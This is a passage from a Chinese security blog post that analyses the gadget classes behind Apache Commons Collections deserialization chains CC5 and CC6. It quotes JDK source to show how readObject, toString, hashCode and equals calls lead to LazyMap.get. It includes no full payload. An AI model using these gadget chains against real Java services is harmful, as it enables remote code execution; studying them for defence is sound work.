<h2 id="BadAttributeValueExpException"><a href="#BadAttributeValueExpException" class="headerlink" title="BadAttributeValueExpException"></a>BadAttributeValueExpException</h2><p>利用链：CC5</p>
<p>该链要求极高<code>This only works in JDK 8u76 and WITHOUT a security manager</code></p>
<p>直接把这段利用关系看了吧</p>
<pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException &#123;
    ObjectInputStream.GetField gf &#x3D; ois.readFields();
    Object valObj &#x3D; gf.get(&quot;val&quot;, null);

    if (valObj &#x3D;&#x3D; null) &#123;
        val &#x3D; null;
    &#125; else if (valObj instanceof String) &#123;
        val&#x3D; valObj;
    &#125; else if (System.getSecurityManager() &#x3D;&#x3D; null
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) &#123;
        val &#x3D; valObj.toString();
    &#125; else &#123; &#x2F;&#x2F; the serialized object is from a version without JDK-8019292 fix
        val &#x3D; System.identityHashCode(valObj) + &quot;@&quot; + valObj.getClass().getName();
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>首先因为我们呢传入的Obj肯定不是字符串，也不会在基础类型中，所以就需要<code>System.getSecurityManager()==null</code>才能进入到valObj.toString方法中</p>
<p>下一步就是找到可以进行触发的toString方法，这里使用的是TiedMapEntry</p>
<h2 id="TiedMapEntry"><a href="#TiedMapEntry" class="headerlink" title="TiedMapEntry"></a>TiedMapEntry</h2><h3 id="toString-NaN"><a href="#toString-NaN" class="headerlink" title="toString"></a>toString</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public String toString() &#123;
    return getKey() + &quot;&#x3D;&quot; + getValue();
&#125;

public class TiedMapEntry implements Map.Entry, KeyValue, Serializable &#123;
    &#x2F;** The map underlying the entry&#x2F;iterator *&#x2F;    
    private final Map map;
    &#x2F;** The key *&#x2F;
    private final Object key;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>调用getValue</p>
<h3 id="getValue"><a href="#getValue" class="headerlink" title="getValue"></a>getValue</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public Object getValue() &#123;
    return map.get(key);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>调用map的get方法，此处map可直接使用LazyMap类，和上面对Map中的get方法的调用进行衔接</p>
<h3 id="hashCode"><a href="#hashCode" class="headerlink" title="hashCode"></a>hashCode</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public int hashCode() &#123;
    Object value &#x3D; getValue();
    return (getKey() &#x3D;&#x3D; null ? 0 : getKey().hashCode()) ^
           (value &#x3D;&#x3D; null ? 0 : value.hashCode()); 
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>调用了getValue方法</p>
<h2 id="HashSet"><a href="#HashSet" class="headerlink" title="HashSet"></a>HashSet</h2><p>利用链：CC6</p>
<h3 id="readObject-2"><a href="#readObject-2" class="headerlink" title="readObject"></a>readObject</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">&#x2F;&#x2F;private transient HashMap&lt;E,Object&gt; map;
private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException &#123;
    &#x2F;&#x2F; Read in any hidden serialization magic
    s.defaultReadObject();
    &#x2F;&#x2F; Read in HashMap capacity and load factor and create backing HashMap
    int capacity &#x3D; s.readInt();
    float loadFactor &#x3D; s.readFloat();
    map &#x3D; (((HashSet)this) instanceof LinkedHashSet ?
           new LinkedHashMap&lt;E,Object&gt;(capacity, loadFactor) :
           new HashMap&lt;E,Object&gt;(capacity, loadFactor));
    &#x2F;&#x2F; Read in size
    int size &#x3D; s.readInt();
    &#x2F;&#x2F; Read in all elements in the proper order.
    for (int i&#x3D;0; i&lt;size; i++) &#123;
        E e &#x3D; (E) s.readObject();
        map.put(e, PRESENT);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>我们直接跟链子，看到最后调用了map的put方法，并且此处的map被限定为了HashMap类，直接往下跟</p>
<h3 id="HashMap"><a href="#HashMap" class="headerlink" title="HashMap"></a>HashMap</h3><p>利用链：CC6</p>
<p>利用方法：</p>
<h3 id="put"><a href="#put" class="headerlink" title="put"></a>put</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public V put(K key, V value) &#123;
    if (table &#x3D;&#x3D; EMPTY_TABLE) &#123;
        inflateTable(threshold);
    &#125;
    if (key &#x3D;&#x3D; null)
        return putForNullKey(value);
    int hash &#x3D; hash(key);
    int i &#x3D; indexFor(hash, table.length);
    for (Entry&lt;K,V&gt; e &#x3D; table[i]; e !&#x3D; null; e &#x3D; e.next) &#123;
        Object k;
        if (e.hash &#x3D;&#x3D; hash &amp;&amp; ((k &#x3D; e.key) &#x3D;&#x3D; key || key.equals(k))) &#123;
            V oldValue &#x3D; e.value;
            e.value &#x3D; value;
            e.recordAccess(this);
            return oldValue;
        &#125;
    &#125;
    modCount++;
    addEntry(hash, key, value, i);
    return null;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处put方法带着key调用了hash方法</p>
<h3 id="hash"><a href="#hash" class="headerlink" title="hash"></a>hash</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">final int hash(Object k) &#123;
    int h &#x3D; hashSeed;
    if (0 !&#x3D; h &amp;&amp; k instanceof String) &#123;
        return sun.misc.Hashing.stringHash32((String) k);
    &#125;

    h ^&#x3D; k.hashCode();

    &#x2F;&#x2F; This function ensures that hashCodes that differ only by
    &#x2F;&#x2F; constant multiples at each bit position have a bounded
    &#x2F;&#x2F; number of collisions (approximately 8 at default load factor).
    h ^&#x3D; (h &gt;&gt;&gt; 20) ^ (h &gt;&gt;&gt; 12);
    return h ^ (h &gt;&gt;&gt; 7) ^ (h &gt;&gt;&gt; 4);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>传入的key执行它的hashCode方法，此处设置key的类为TiedMapEntry</p>
<h2 id="Hashtable"><a href="#Hashtable" class="headerlink" title="Hashtable"></a>Hashtable</h2><h3 id="readObject-3"><a href="#readObject-3" class="headerlink" title="readObject"></a>readObject</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">private void readObject(java.io.ObjectInputStream s)
     throws IOException, ClassNotFoundException
&#123;
    &#x2F;&#x2F; Read in the length, threshold, and loadfactor
    s.defaultReadObject();

    &#x2F;&#x2F; Read the original length of the array and number of elements
    int origlength &#x3D; s.readInt();
    int elements &#x3D; s.readInt();

    &#x2F;&#x2F; Compute new size with a bit of room 5% to grow but
    &#x2F;&#x2F; no larger than the original size.  Make the length
    &#x2F;&#x2F; odd if it&#39;s large enough, this helps distribute the entries.
    &#x2F;&#x2F; Guard against the length ending up zero, that&#39;s not valid.
    int length &#x3D; (int)(elements * loadFactor) + (elements &#x2F; 20) + 3;
    if (length &gt; elements &amp;&amp; (length &amp; 1) &#x3D;&#x3D; 0)
        length--;
    if (origlength &gt; 0 &amp;&amp; length &gt; origlength)
        length &#x3D; origlength;

    Entry&lt;K,V&gt;[] newTable &#x3D; new Entry[length];
    threshold &#x3D; (int) Math.min(length * loadFactor, MAX_ARRAY_SIZE + 1);
    count &#x3D; 0;
    initHashSeedAsNeeded(length);

    &#x2F;&#x2F; Read the number of elements and then all the key&#x2F;value objects
    for (; elements &gt; 0; elements--) &#123;
        K key &#x3D; (K)s.readObject();
        V value &#x3D; (V)s.readObject();
        &#x2F;&#x2F; synch could be eliminated for performance
        reconstitutionPut(newTable, key, value);
    &#125;
    this.table &#x3D; newTable;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>看不懂（bushi）直接看关键<code>reconstitutionPut</code></p>
<h3 id="reconstitutionPut"><a href="#reconstitutionPut" class="headerlink" title="reconstitutionPut"></a>reconstitutionPut</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">private void reconstitutionPut(Entry&lt;K,V&gt;[] tab, K key, V value)
    throws StreamCorruptedException
&#123;
    if (value &#x3D;&#x3D; null) &#123;
        throw new java.io.StreamCorruptedException();
    &#125;
    &#x2F;&#x2F; Makes sure the key is not already in the hashtable.
    &#x2F;&#x2F; This should not happen in deserialized version.
    int hash &#x3D; hash(key);
    int index &#x3D; (hash &amp; 0x7FFFFFFF) % tab.length;
    for (Entry&lt;K,V&gt; e &#x3D; tab[index] ; e !&#x3D; null ; e &#x3D; e.next) &#123;
        if ((e.hash &#x3D;&#x3D; hash) &amp;&amp; e.key.equals(key)) &#123;
            throw new java.io.StreamCorruptedException();
        &#125;
    &#125;
    &#x2F;&#x2F; Creates the new entry.
    Entry&lt;K,V&gt; e &#x3D; tab[index];
    tab[index] &#x3D; new Entry&lt;&gt;(hash, key, value, e);
    count++;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处调用了e.key.equals(key)，两个key都是LazyMap类型，跟入对应类中方法</p>
<script type="text&#x2F;javascript" src="https://unpkg.com/kity@2.0.4/dist/kity.min.js"></script><script type="text&#x2F;javascript" src="https://unpkg.com/kityminder-core@1.4.50/dist/kityminder.core.min.js"></script><script defer="true" type="text&#x2F;javascript" src="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.js"></script><link rel="stylesheet" type="text&#x2F;css" href="https://unpkg.com/hexo-simple-mindmap@0.8.0/dist/mindmap.min.css">
                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">J1an</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://jlan.darkflow.top/posts/2f60179e.html">http://jlan.darkflow.top/posts/2f60179e.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">J1an</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Java/">
                                    <span class="chip bg-color">Java</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/posts/2f60179e.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="CC链碎片">
                        
                        <span class="card-title">CC链碎片</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            CC链碎片众所周知，CC链本质上就是对不同的反序列化进行拼凑得到的，那么我们只要将其中的碎片进行总结再加以利用就可以构造出所有的CC链，这篇水文就是用来总结CC中的所有碎片的
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-11-21
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            J1an
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Java/">
                        <span class="chip bg-color">Java</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/eb326eb3.html">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="CommonsCollections反序列化分析">
                        
                        <span class="card-title">CommonsCollections反序列化分析</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-11-14
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            J1an
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Java/">
                        <span class="chip bg-color">Java</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022</span>
            
            <a href="/about" target="_blank">J1an</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:jlan@icloud.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>





    <a href="https://twitter.com/J1an45" class="tooltipped" target="_blank" data-tooltip="关注我的Twitter: https://twitter.com/J1an45" data-position="top" data-delay="50">
        <i class="fab fa-twitter"></i>
    </a>









</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
     
        <script type="text/javascript">
            // 只在桌面版网页启用特效
            var windowWidth = $(window).width();
            if (windowWidth > 768) {
                document.write('<script type="text/javascript" src="/libs/others/star.js"><\/script>');
            }
        </script>
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
